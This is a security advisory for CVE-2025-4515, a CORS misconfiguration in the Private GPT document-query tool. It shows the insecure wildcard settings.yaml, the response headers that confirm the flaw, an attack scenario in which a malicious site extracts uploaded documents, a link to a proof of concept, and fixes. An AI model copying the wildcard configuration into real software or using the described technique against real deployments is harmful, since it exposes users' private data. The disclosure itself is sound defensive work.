Private GPT is a production-ready AI solution enabling secure, private queries on documents using Large Language Models (LLMs). Designed for privacy, it operates without an Internet connection, ensuring no data leaves the execution environment.
However, Private GPT's CORS settings are insecurely misconfigured, allowing any origin to interact with the application without restriction. This flaw exposes sensitive user data when victims are visiting attackers' website. By exploiting the CORS misconfiguration vulnerability, attackers bypass the intended isolation of Private GPT and are able to fully interact with it. Even in environments deployed on internal networks, attackers are able to chat and extract sensitive information such as credentials, private documents, or any information from previously uploaded materials.
- Status: Assigned
- CVE: CVE-2025-4515
- Code Base: Versions up to and including 2025.04.23
- Released Versions: Versions up to and including v0.6.2
Private GPT's CORS settings are overly permissive, configured with a wildcard (*) for trusted origins. This allows any origin to interact with the service without being blocked by the same-origin policy.
Attackers can exploit this by deploying malicious JavaScript that interacts with Private GPT’s API to extract sensitive user data. Even when deployed on an internal network, this vulnerability enables unauthorized data access through crafted requests.
By modifying the Origin request header, an attacker can confirm the misconfiguration. The response headers indicate the application's trust in any origin:
access-control-allow-credentials: true
access-control-allow-origin: http://ANYThe root issue lies in the settings.yaml file, where CORS is improperly configured to whitelist all origins:
cors:
enabled: true
allow_origins: ["*"]
allow_methods: ["*"]
allow_headers: ["*"]- A victim uploaded sensitive documents, including credentials, to Private GPT.
- An attacker hosts malicious code and tricks the victim into interacting with it (e.g., by clicking a link).
- The malicious code exploits the CORS misconfiguration to interact with Private GPT’s API, exfiltrating sensitive data such as passwords.
A proof-of-concept demonstration is available here: https://gist.github.com/superboy-zjc/f29fd02a586dc8bbe52bb95153731ad1
The demo highlights the feasibility of unauthorized access to Private GPT deployed on http://127.0.0.1:8001. In a real-world attack, data would be silently exfiltrated to an attacker-controlled server, making the activity inconspicuous.
(Malicious Website Interact with Private GPT)
(Sensitive Information can be extracted)
- Sensitive data exposure: Private GPT can inadvertently leak sensitive user-uploaded documents or credentials.
- Increased attack surface: Even when deployed in an isolated environment, the vulnerability allows unauthorized access.
- Trust erosion: Users rely on Private GPT for privacy and security; such vulnerabilities undermine this trust.
-
Restrict Trusted Origins: Replace the wildcard origin (
*) in settings.yaml with a strict list of trusted domains, such as:cors: enabled: true origins: - "http://localhost:8000" - "https://your-domain.com" -
Secure Deployment Practices: Deploy Private GPT in environments with strict network segmentation and access controls to minimize attack exposure.


